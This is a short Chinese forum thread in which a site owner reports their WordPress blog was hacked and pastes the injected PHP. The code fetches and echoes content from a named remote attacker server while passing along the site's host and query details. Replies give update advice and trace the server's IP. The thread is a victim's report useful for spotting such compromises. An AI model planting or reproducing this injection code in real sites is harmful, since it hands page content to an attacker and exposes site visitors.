自己有个网站一直没用,上面挂的是 wordpress 博客,今天上去一看被黑了。
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$Remote_server = "http://www.028blue.com/xmbt/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
echo $Content_mb;
内容是随机的,刷新一次换一个样,不忍直视。。
1
Mutoo 2017-07-31 10:05:50 +08:00
开启自动升级,不然出漏洞没更新很容易被拿下。
|
2
msputup 2017-07-31 10:09:44 +08:00
wordpress 是最好黑的博客,没有之一。
|
5
scofieldpeng 2017-07-31 12:29:44 +08:00
看了下 028blue.com 这个,试着按着这个代码想看看,结果打不开,host 了一下,ip 是 122.10.93.116,坐标香港,cloudie.hk 的机器,然后顺便想扫描下的,结果主机貌似下线了,可惜
|